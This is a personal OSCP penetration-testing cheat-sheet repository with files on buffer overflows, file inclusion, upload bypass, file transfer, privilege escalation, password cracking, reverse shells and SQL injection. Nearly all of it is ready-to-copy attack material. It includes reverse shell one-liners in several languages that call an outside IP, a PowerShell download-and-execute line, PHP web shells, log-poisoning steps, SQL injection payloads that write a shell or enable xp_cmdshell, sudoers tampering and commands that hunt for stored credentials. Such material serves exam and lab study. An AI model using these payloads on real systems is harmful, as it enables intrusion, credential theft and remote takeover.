├── Buffer Overflow.md
├── File Inclusion.md
├── File Transfer.md
├── File upload.md
├── Interesting files.md
├── Linux Priv Esc.md
├── Password.md
├── README.md
├── Reverse shell.md
├── SQLi.md
└── Windows Priv Esc.md


/Buffer Overflow.md:
--------------------------------------------------------------------------------
 1 | # BOF
 2 | **1. Check buffer length to trigger overflow**  
 3 | 
 4 | **2. Cofirm overflow length, append "A" * length**  
 5 | 
 6 | **3. Generate Offset to check EIP, ESP location**  
 7 |   /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>
 8 | 
 9 | 	Record value on EIP, select ESP and click "Follow in Dump"  
10 | 	/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <value> -l <length>  
11 | 
12 | 	Use !mona to find the offset after the overflow  
13 | 	!mona findmsp  
14 | 
15 | **4. Confirm EIP by adding "B" * 4 after the number of offset. Also, add a number of "C" to track the number of characters that can be added after EIP to confirm length of shellcode**
16 | 
17 | **5. Check bad characters after EIP. common bad characters are 0x00, 0x0A. Follow dump in ESP to check are there something missing after that.**
18 | Add code:
19 | 
20 | 	badchar = [0x00]
21 | 	for ch in range (0x00 , 0xFF+1):
22 | 		if ch not in badchar:
23 | 			<payload> += chr(ch)
24 | 
25 | **6. Find JMP ESP address in the system.**
26 | 	JMP ESP = FFE4
27 | 
28 | 	!mona jmp -r esp -cpb "\x00\x0A" << bad character
29 | 
30 | 	!mona modules
31 | 	!mona find -s "\xff\xe4" -m brainpan.exe
32 | 
33 | 	check the value of the address by naviate to it.
34 | 	Set breakpoint
35 | 	Change "B" in EIP to the address of JMP ESP << littile edian
36 | 
37 | 	e.g. 0x311712f3 >> "\xf3\x12\x17\x31"
38 | 
39 | 	Run again to check is the breakpoint triggered
40 | 
41 | **7. Add shellcode**
42 | 	Add a few \x90 before shellcode to avoid shellcode being modify
43 | 
44 | 	msfvenom -p windows/shell_reverse_tcp LHOST=<IP>LPORT=<PORT> EXITFUNC=thread -f <Code Format> -a x86 -platform windows -b "\x00"
45 | 	msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP>LPORT=<PORT> EXITFUNC=thread -f <Code Format> -b "\x00"
46 | 
47 | **Bonus: Running out of shell code space?**
48 | Use the front of payload instead
49 | 1. Is there any register points to the front of our payload? EAX, EDX?
50 | 2. Check JMP register address
51 | 	/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
52 | 
53 | 	JMP EAX/EBX/ECX/EDX
54 | 
55 | 3. Append the address as shell code.
56 | 4. Add payload to the front
57 | 
58 | 
59 | 
60 | 
61 | 
62 | 


--------------------------------------------------------------------------------
/File Inclusion.md:
--------------------------------------------------------------------------------
  1 | ## LFI/RFI
  2 | Exploiting PHP File Inclusion – Overview
  3 | https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
  4 | 
  5 | Add %00 to test if the file is adding .php to the filename < before php version 5.3
  6 | Add ? to act as another parameter
  7 | 
  8 | include will execute the file. Others will not
  9 | 
 10 | ## Local File inclusion
 11 | $file = $_GET['page'];
 12 | require($file);
 13 | 
 14 | check with files that generally can be accessed
 15 | /etc/passwd
 16 | /etc/hostname
 17 | /etc/hosts
 18 | 
 19 | read php file
 20 | php://filter/convert.base64-encode/resource=<file name/Path> e.g. index
 21 | echo "<output>" |base64 -d
 22 | 
 23 | .htaccess
 24 | config.php in web root folder?
 25 | 
 26 | root/user ssh keys? .bash_history?
 27 | /.ssh/id_rsa
 28 | /.ssh/id_rsa.keystore
 29 | /.ssh/id_rsa.pub
 30 | /.ssh/authorized_keys
 31 | /.ssh/known_hosts
 32 | 
 33 | php Wrapper  
 34 | expect://<command>  
 35 | 
 36 | page=php://input&cmd=ls  
 37 | in POST request  
 38 | <?php echo shell_exec($GET_['cmd']);?>  
 39 | 
 40 | Upload Zip shell file and extract with zip  
 41 | zip://path/to/file.zip%23shell  
 42 | zip://path/to/file.zip%23shell.php  
 43 | 
 44 | Check current running user  
 45 | /proc/self/status  
 46 | check uid and gid  
 47 | 
 48 | ### Log Poisoning  
 49 | https://wiki.apache.org/httpd/DistrosDefaultLayout  
 50 | **Common log file location**  
 51 | **Ubuntu, Debian**  
 52 | /var/log/apache2/error.log  
 53 | /var/log/apache2/access.log  
 54 | 
 55 | **Red Hat, CentOS, Fedora, OEL, RHEL**  
 56 | /var/log/httpd/error_log  
 57 | /var/log/httpd/access_log  
 58 |   
 59 | **FreeBSD**  
 60 | /var/log/httpd-error.log  
 61 | /var/log/httpd-access.log  
 62 | 
 63 | **Common Config file location**  
 64 | check any restriction or hidden path on accessing the server  
 65 | 
 66 | **Ubuntu**  
 67 | /etc/apache2/apache2.conf  
 68 | 
 69 | /etc/apache2/httpd.conf  
 70 | /etc/apache2/apache2.conf  
 71 | /etc/httpd/httpd.conf  
 72 | /etc/httpd/conf/httpd.conf  
 73 | 
 74 | **FreeBSD**  
 75 | /usr/local/etc/apache2/httpd.conf  
 76 | 
 77 | Hidden site?  
 78 | /etc/apache2/sites-enabled/000-default.conf  
 79 | 
 80 | proc/self/environ  
 81 | https://www.exploit-db.com/papers/12886/  
 82 | /proc/self/environ  
 83 | 
 84 | ### SSH log posioning  
 85 | http://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/  
 86 | 
 87 | ### Mail log  
 88 | telnet <IP> 25  
 89 | EHLO <random character>  
 90 | 
 91 | VRFY <user>@localhost  
 92 | 
 93 | mail from:attacker@attack.com  
 94 | rcpt to: <user>@localhost  
 95 | data  
 96 | 
 97 | Subject: title  
 98 | <?php echo system($_REQUEST['cmd']); ?>  
 99 | 
100 | <end with .>  
101 | 
102 | LFI /var/mail/<user>  
103 | 
104 | ## Remote File Inclusion  
105 | requires allow_url_fopen=On and allow_url_include=On  
106 | 
107 | $incfile = $_REQUEST["file"];  
108 | include($incfile.".php");  
109 | 
110 | 


--------------------------------------------------------------------------------
/File Transfer.md:
--------------------------------------------------------------------------------
 1 | # File Transfer
 2 | 
 3 | 15 Ways to transfer a file
 4 | https://blog.netspi.com/15-ways-to-download-a-file/#perl
 5 | 
 6 | ### FTP
 7 | /etc/init.d/pure-ftpd restart
 8 | 
 9 | Windows
10 | echo "open <IP>">ftp.txt  
11 | echo "offsec">>ftp.txt  
12 | echo "offsec">>ftp.txt  
13 | echo "bin">>ftp.txt  
14 | echo "get file.exe">>ftp.txt  
15 | echo "bye">>ftp.txt  
16 | 
17 | ftp -s ftp.txt  
18 | 
19 | Linux
20 | ftp -4 -d -v ftp://offsec:offsec@127.0.0.1//linuxprichecker.py < ftp upload one liner linux
21 | 
22 | ### Powershell
23 | powershell.exe  (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip") 
24 | 
25 | powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<IP>/<script>')"
26 | 
27 | powershell full path:
28 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
29 | C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
30 | 
31 | 
32 | ### Smbsever
33 | impacket-smbserver <share name> <path>
34 | 
35 | net view \\\\\<ip>
36 | 
37 | ### SCP
38 | After login through ssh
39 | scp <fileToUpload> user@remote:/path
40 | 


--------------------------------------------------------------------------------
/File upload.md:
--------------------------------------------------------------------------------
 1 | # File Upload
 2 | If try to upload webshell to victim check how the exploit is done.
 3 | Check any bad characters
 4 | 
 5 | e.g. $XXX is taken as variable in bash, need to use \$ to escape
 6 | 
 7 | ### WebDav  
 8 | 
 9 | upload file:  
10 | curl -T '/path/to/local/file.txt' 'https://example.com/test/'  
11 | curl --upload-file \<file> http://\<IP>/test/\<filename>  
12 | 
13 | curl -X MOVE --header 'Destination:http://example.org/new.txt' 'https://example.com/old.txt'  
14 | curl -X COPY --header 'Destination:http://example.org/new.txt' 'https://example.com/old.txt'  
15 | 
16 | login:  
17 | curl --user 'user:pass' 'https://example.com'  
18 | 
19 | Upload bypass:  
20 | https://www.owasp.org/index.php/Unrestricted_File_Upload  
21 | https://soroush.secproject.com/blog/tag/unrestricted-file-upload/  
22 |  
23 | IIS 6.0 or below
24 | Asp > upload as test.txt, copy or move file as test.asp;.txt
25 | 
26 | Php > upload as pHp / phP / test.php.jpg / 
27 | 
28 | php - phtml, .php, .php3, .php4, .php5, and .inc
29 | 
30 | asp - asp, .aspx
31 | 
32 | perl - .pl, .pm, .cgi, .lib
33 | 
34 | jsp - .jsp, .jspx, .jsw, .jsv, and .jspf
35 | 
36 | Coldfusion - .cfm, .cfml, .cfc, .dbm
37 | 
38 | Add:   
39 | 
40 | GIF89a;
41 | \<?
42 | system($_GET['cmd']);//or you can insert your complete shell code
43 | ?>
44 | 
45 | 
46 | ### Options
47 | Use options to check for upload method.
48 | 
49 | upload function. Is put allowed?
50 | 


--------------------------------------------------------------------------------
/Interesting files.md:
--------------------------------------------------------------------------------
 1 | # Interesting files that worth looking at
 2 | ## Windows  
 3 | c:\windows\system32\eula.txt  
 4 | cl\windows\system32\license.rtf  
 5 | 
 6 | c:\WINDOWS\win.ini  
 7 | c:\WINNT\win.ini
 8 | 
 9 | Password hash?  
10 | c:\WINDOWS\Repair\SAM    
11 | c:\WINDOWS\Repair\system  
12 | pwdump SAM system  
13 | 
14 | c:\WINDOWS\php.ini  
15 | c:\WINNT\php.ini  
16 | c:\Program Files\Apache Group\Apache\conf\httpd.conf  
17 | c:\Program Files\Apache Group\Apache2\conf\httpd.conf  
18 | c:\Program Files\xampp\apache\conf\httpd.conf  
19 | c:\php\php.ini  
20 | c:\php5\php.ini  
21 | c:\php4\php.ini  
22 | c:\apache\php\php.ini  
23 | c:\xampp\apache\bin\php.ini  
24 | c:\home2\bin\stable\apache\php.ini  
25 | c:\home\bin\stable\apache\php.ini
26 | 
27 | https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/
28 | 
29 | ## Linux
30 | https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux/
31 | 
32 | 


--------------------------------------------------------------------------------
/Linux Priv Esc.md:
--------------------------------------------------------------------------------
  1 | # Linux privilege escalation
  2 | ### Spawn Interactive Shell and set env  
  3 | 
  4 | python -c 'import pty;pty.spawn("/bin/bash");'  
  5 | ctrl z  
  6 | echo $TERM  
  7 | stty -a  
  8 | stty raw -echo  
  9 | fg  
 10 | 
 11 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH  
 12 | export TERM=xterm256-color  
 13 | export SHELL=bash  
 14 | 
 15 | stty rows \<> colums \<>  
 16 | 
 17 | ### Restricted bash
 18 | perl -e 'exec "/bin/sh";'  
 19 | /bin/sh -i  
 20 | exec "/bin/sh";  
 21 | echo os.system('/bin/bash')  
 22 | /bin/sh -i  
 23 | ssh user@$ip nc $localip 4444 -e /bin/sh  
 24 | export TERM=linux  
 25 | 
 26 | ### Check environment 
 27 | Check any restricitions on any folders  
 28 | mount -l        >> any no exec or no suid?  
 29 | 
 30 | Check any unmounted drives  
 31 | cat /etc/fstab  
 32 | 
 33 | ### SUID
 34 | find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.  
 35 | find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.  
 36 | find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.  
 37 | 
 38 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID < full search  
 39 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin < quicker  
 40 | 
 41 | -find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
 42 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null  
 43 | 
 44 | find / perm /u=s -user "User name that you are looking for" 2>/dev/null  
 45 | 
 46 | ### Writable file and nobody files  
 47 | find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files  
 48 | find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files  
 49 | 
 50 | ### Writable by current user  
 51 | find / perm /u=w -user `whoami` 2>/dev/null  
 52 | find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null  
 53 | find / -perm /u+w -user `whoami` 2>/dev/nul  
 54 | 
 55 | ### Any script files that we can modify?  
 56 | find / -writable -type f -name "*.py" 2>/dev/null     #find all python file that can be write by us  
 57 | 
 58 | ls -aRl / | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone  
 59 | ls -aRl / | awk '$1 ~ /^..w/' 2>/dev/null       # Owner  
 60 | ls -aRl / | awk '$1 ~ /^.....w/' 2>/dev/null    # Group  
 61 | ls -aRl / | awk '$1 ~ /w.$/' 2>/dev/null        # Other  
 62 | 
 63 | find / -readable -type f 2>/dev/null               # Anyone  
 64 | find / -readable -type f -maxdepth 1 2>/dev/null   # Anyone  
 65 | 
 66 | ### Any service running by root?  
 67 | ps aux|grep "root"  
 68 | 
 69 | /usr/bin/journalctl (Which is normally not readable by a user) << cron job?  
 70 | 
 71 | ### Find password  
 72 | grep -rnw '/' -ie 'pass' --color=always  
 73 | grep -rnw '/' -ie 'DB_PASS' --color=always  
 74 | grep -rnw '/' -ie 'DB_PASSWORD' --color=always  
 75 | grep -rnw '/' -ie 'DB_USER' --color=always  
 76 | 
 77 | # Exploit Time
 78 | ## SUID
 79 | #### Is suid bit set on these applications?
 80 | 
 81 | Nmap  
 82 |     nmap -V     <Nmap version 2.02 - 5.21 had an interactive mode  
 83 |     nmap --interactive  
 84 |     nmap> !sh  
 85 |     
 86 | Vim  
 87 |     Modify system file, e.g. passwd?  
 88 |     
 89 |     vim.tiny  
 90 |     - Press ESC key  
 91 |     :set shell=/bin/sh  
 92 |     :shell  
 93 |     
 94 | find  
 95 |     touch pentestlab  
 96 |     find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;  
 97 |     
 98 | Bash  
 99 |     bash -p      
100 |             
101 | More  
102 |     
103 | Less  
104 |     less /etc/passwd  
105 |     !/bin/sh  
106 | 
107 | Nano  
108 |     Can you modify system file?  
109 |     Modify /etc/suoders  
110 |     \<user> ALL=(ALL) NOPASSWD:ALL  
111 |     
112 | cp  
113 |     Use cp to overwrite passwd with a new password  
114 |     
115 | ### Is there a custom suid application?  
116 | How can this application be run?  
117 | Can be modify the path variable so that it will execute something else  
118 | 
119 | ## NFS priv esc
120 | https://medium.com/@Kan1shka9/hacklab-vulnix-walkthrough-b2b71534c0eb
121 | 
122 | ## Linux capability
123 | find / -type f -print0 2>/dev/null | xargs -0 getcap 2>/dev/null
124 | getcap -r /
125 | 
126 | google that capability on how it can help us get root
127 | 
128 | ## Mysql run by root
129 | MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library
130 | https://www.exploit-db.com/exploits/1518/
131 | 
132 | You can also try
133 | select sys_exec('echo test>/tmp/test.txt');
134 | select sys_eval('echo test>/tmp/test.txt');
135 | 
136 | 


--------------------------------------------------------------------------------
/Password.md:
--------------------------------------------------------------------------------
 1 | # Password Attack
 2 | Any possibility that the user will re use the password????
 3 | 
 4 | ### Wordlists
 5 | Generate a custom wordlist
 6 | cewl -w createWordlist.txt -m <min password length> https://www.example.com
 7 | 
 8 | ### Offline
 9 | https://hashes.org/search.php
10 | 
11 | john the ripper
12 | john --wordlist=/user/share/wordlists/rockyou.txt hash.txt
13 | 
14 | Hashcat << check type online - hashcat sample hash
15 | hashcat -m\<type> -a 0 /usr/share/wordlists/rockyou.txt hash.txt
16 | 
17 | ### Online
18 | HTTP post form
19 | 
20 | hydra -L <wordlist> -P<password list> <IP> http-post-form "<file path>:username=^USER^&password=^PASS^&Login=Login:<fail message>"
21 | 
22 | 1. easy password? e.g. password, 123456
23 | 2. Company or site name or its variations? e.g. use the software name as password
24 | 3. Name=Password and other hints
25 | 4. Simple sequences
26 | 5. Basic words
27 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OSCP cheat sheet
2 | 
3 | Just some oscp cheat sheet stuff that I customized for myself. It may look messy, I just use it to copy the command I needed easily.
4 | 
5 | The content in this repo is not meant to be a full list of commands that you will need in OSCP. It rather just a list of commands that I found them useful with a few notes on them.
6 | 


--------------------------------------------------------------------------------
/Reverse shell.md:
--------------------------------------------------------------------------------
 1 | # Revser shell
 2 | **1. Check which port is allowed for reverse shell** 
 3 | 
 4 | 	sometime certain out going traffic is blocked by your victim   
 5 | 	nc -nvv -w 1 -z "Your IP Address" 1-100  
 6 | 	open Wireshark  
 7 | 
 8 | **2. Reverse shell list**  
 9 | 
10 | 	Bash  
11 | 	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
12 | 
13 | 	Php  
14 | 	php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
15 | 
16 | 	Perl  
17 | 	perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
18 | 
19 | 	Python  
20 | 	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
21 | 
22 | 	Ruby  
23 | 	ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
24 | 
25 | 	Netcat  
26 | 	nc -e /bin/sh 10.0.0.1 1234
27 | 	(Really like this one)
28 | 	rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 
29 | 


--------------------------------------------------------------------------------
/SQLi.md:
--------------------------------------------------------------------------------
  1 | # SQL injection 
  2 | 
  3 | ## Login Bypass:   << replace ' with " if fail
  4 |   ' or '1'='1  
  5 |   ' or 1=1;--  
  6 |   ' or 1=1;#  
  7 |   ') or ('x'='x  
  8 |   ' or <column> like '%';--  
  9 |   ' or 1=1 LIMIT 1;--  
 10 | 
 11 |   USERNAME:   ' or 1/*  
 12 |   PASSWORD:   */ =1 --  
 13 | 
 14 |   USERNAME: admin' or 'a'='a  
 15 |   PASSWORD '#  
 16 | 
 17 | If the database is mysql, try to dump all login info to files?
 18 | 
 19 | Mysql
 20 |   '*'   
 21 |   '&'  
 22 |   '^'  
 23 |   '-'  
 24 |   ' or true;--   
 25 |   ' or 1;--  
 26 | 
 27 | union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
 28 | 
 29 | ## Enumeration
 30 | 1. Confirm number of columns
 31 | order by 1 -- 100
 32 | 
 33 | 2. union select
 34 | union select 1,2,3,4,5,6,7 to find which column will display info
 35 | 
 36 | 3. Find databse name, user name, and version.  << must use group_concat for one liner
 37 | (select group_concat(database(),0x3a,user(),0x3a,version()))
 38 | 
 39 | 4. Find table name
 40 | table_name                                      from information_schema.tables where table_schema=database()
 41 | (select group_concat(table_name) from information_schema.tables where table_schema=database())
 42 | 
 43 | 5. Find columns 
 44 | column_name                                 from information_schema.columns where table_name='<Table_Name>'
 45 | column_name                                 from information_schema.columns where table_name=<HEX>
 46 | column_name                                 from information_schema.columns where table_name like <HEX>
 47 | (select group_concat(column_name) from information_schema.columns where table_name='dev_accounts')
 48 | (select group_concat(column_name) from information_schema.columns where table_name=0x6465765f6163636f756e7473)   << possible that some character are filtered out
 49 | 
 50 | 6. Dump data
 51 | (select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts)
 52 | 
 53 | 7. One liner to output all corresponding databse with table and columns
 54 | (select group_concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns)
 55 | (select group_concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where table_schema=database())
 56 | 
 57 | 	concat(table_schema,0x3a,table_name,0x3a,column_name)               from information_schema.columns where table_schema=database()
 58 | 
 59 | ### MSSQL Enumeration: Error based 
 60 | https://www.exploit-db.com/papers/12975/
 61 | 
 62 | 	Enumerate column and table name
 63 | 	http://www.example.com/page.asp?id=1' HAVING 1=1--
 64 | 	Error message: Column 'news.news_id' is invalid                 < table_name.column
 65 | 
 66 | 	http://www.example.com/page.asp?id=1' GROUP BY news.news_id HAVING 1=1--
 67 | 	Error message: Column 'news.news_author' is invalid           < table_name.column2
 68 | 
 69 | 	http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author HAVING 1=1--
 70 | 	Error message: Column 'news.news_detail' is invalid             < table_name.column3
 71 | 
 72 | 	Until no error
 73 | 
 74 | 	Enumerate version, db name, users:
 75 | 	http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--
 76 | 	http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
 77 | 	http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--       << Is the user running as dbo or sa?
 78 | 
 79 | 	xp_cmdshell << if running as database admin
 80 | 	http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
 81 | 	'; exec master.dbo.xp_cmdshell 'command'
 82 | 
 83 | 
 84 | 
 85 | 	On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
 86 | 	EXEC sp_configure 'show advanced options', 1;--
 87 | 	RECONFIGURE;-- 
 88 | 	EXEC sp_configure 'xp_cmdshell', 1;-- 
 89 | 	RECONFIGURE;--  
 90 | 
 91 | 	On MSSQL 2000:
 92 | 	EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
 93 | 
 94 | 
 95 | ## SQL filter bypass
 96 | Beyond SQLi: Obfuscate and Bypass - https://www.exploit-db.com/papers/17934/
 97 | 
 98 | 	AND, OR operators
 99 | 	AND = &&
100 | 	OR = ||
101 | 
102 | 	Comment operator << Mysql
103 | 	--  	
104 | 	#  
105 | 	/**/  
106 | 
107 | 	Regular expression
108 | 	It is common that PHPIDS will block operators such as =, ', (), 
109 | 	table_name = 'users' X
110 | 	table_name between 'a' and 'z' X
111 | 	table_name between char(97) and char(122) X
112 | 
113 | 	Convert strings to HEX format.
114 | 	table_name between 0x61 and 0x7a
115 | 	table_name like 0x7573657273
116 | 
117 | 	Change case
118 | 	union > UniOn
119 | 	select > SeLect
120 | 
121 | 	Inline comments << Mysql 5.0
122 | 	/*! <sql operator> */
123 | 


--------------------------------------------------------------------------------
/Windows Priv Esc.md:
--------------------------------------------------------------------------------
  1 | # Windows Privilege Escalation
  2 | 
  3 | ### patch level  
  4 | systeminfo  
  5 | wmic qfe get Caption,Description,HotFixID,InstalledOn  
  6 | 
  7 | whoami  
  8 | echo %USERNAME%  
  9 | 
 10 | net user  
 11 | net localgroup  
 12 | 
 13 | users in a domain  
 14 | net user /domain  
 15 | 
 16 | net group /domain  
 17 | net group /domain <Group Name>  
 18 | 
 19 | ### Firewall  
 20 | netsh firewall show state  
 21 | netsh firewall show config  
 22 | 
 23 | ### Network  
 24 | ipconfig /all  
 25 | route print  
 26 | arp -A  
 27 | 
 28 | ### Scheduled Tasks  
 29 | schtasks /query /fo LIST /v  
 30 | --copy output and save in txt  
 31 | cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM  
 32 | 
 33 | dir %SystemRoot%\Tasks  
 34 | 
 35 | e.g. c:\windows\tasks\  
 36 | e.g. c:\windows\system32\tasks\  
 37 | 
 38 | ### Weak Service Permissions  
 39 | Check service config can be modify or not  
 40 | 
 41 | accesschk.exe /accepteula  
 42 | accesschk.exe -uwcqv "Authenticated Users" * /accepteula  
 43 | accesschk.exe -ucqv \<Service Name>  
 44 | 
 45 | sc qc \<Service Name> -- Get service details  
 46 | 
 47 | Check service with weak file permission  
 48 | User c:\windows\temp\  
 49 | 
 50 | wmic.exe  
 51 | for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
 52 | for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"  
 53 | 
 54 | sc.exe  
 55 | sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  
 56 | FOR /F %i in (Servicenames.txt) DO echo %i  
 57 | type Servicenames.txt  
 58 | FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  
 59 | FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt  
 60 | 
 61 | ### Unquoted Service Path  
 62 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  
 63 | 
 64 | sc query  
 65 | sc qc service name  
 66 | 
 67 | ### AlwaysInstallElevated << IF 64 bits use:  %SystemRoot%\Sysnative\reg.exe  
 68 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  
 69 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  
 70 | 
 71 | ### Service only available from inside  
 72 | netstat -ano  
 73 | upload plink.exe  
 74 | 
 75 | plink.exe -R "remote port":127.0.0.1:"local port"  root@"ipaddress"
 76 | 
 77 | ### Pasword in files  
 78 | https://pentestlab.blog/tag/privilege-escalation/page/3/  
 79 | cmdkey /list        << If there are entries, it means that we may able to runas certain user who stored his cred in windows  
 80 | runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"  
 81 | 
 82 | Can we find any SAM files?  
 83 | %SYSTEMROOT%\repair\SAM  
 84 | %SYSTEMROOT%\System32\config\RegBack\SAM  
 85 | %SYSTEMROOT%\System32\config\SAM  
 86 | %SYSTEMROOT%\repair\system  
 87 | %SYSTEMROOT%\System32\config\SYSTEM  
 88 | %SYSTEMROOT%\System32\config\RegBack\system  
 89 | 
 90 | findstr /si password *.txt  
 91 | findstr /si password *.xml  
 92 | findstr /si password *.ini  
 93 | findstr /si pass/pwd *.ini  
 94 | 
 95 | dir /s *pass* == *cred* == *vnc* == *.config*  
 96 | 
 97 | in all files  
 98 | findstr /spin "password" *.*  
 99 | findstr /spin "password" *.*  
100 | 
101 | Unattended? vnc?  
102 | c:\sysprep.inf  
103 | c:\sysprep\sysprep.xml  
104 | c:\unattend.xml  
105 | %WINDIR%\Panther\Unattend\Unattended.xml  
106 | %WINDIR%\Panther\Unattended.xml  
107 | 
108 | dir /b /s unattend.xml  
109 | dir /b /s web.config  
110 | dir /b /s sysprep.inf  
111 | dir /b /s sysprep.xml  
112 | dir /b /s *pass*  
113 | 
114 | dir c:\*vnc.ini /s /b  
115 | dir c:\*ultravnc.ini /s /b   
116 | dir c:\ /s /b | findstr /si *vnc.ini  
117 | 
118 | ### VNC  
119 | reg query "HKCU\Software\ORL\WinVNC3\Password"  
120 | reg query "HKCU\Software\TightVNC\Server"  
121 | 
122 | ### Windows autologin  
123 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
124 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  
125 | 
126 | ### SNMP Paramters  
127 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"  
128 | 
129 | ### Putty  
130 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  
131 | 
132 | ### Search for password in registry  
133 | reg query HKLM /f password /t REG_SZ /s  
134 | reg query HKCU /f password /t REG_SZ /s  
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 


--------------------------------------------------------------------------------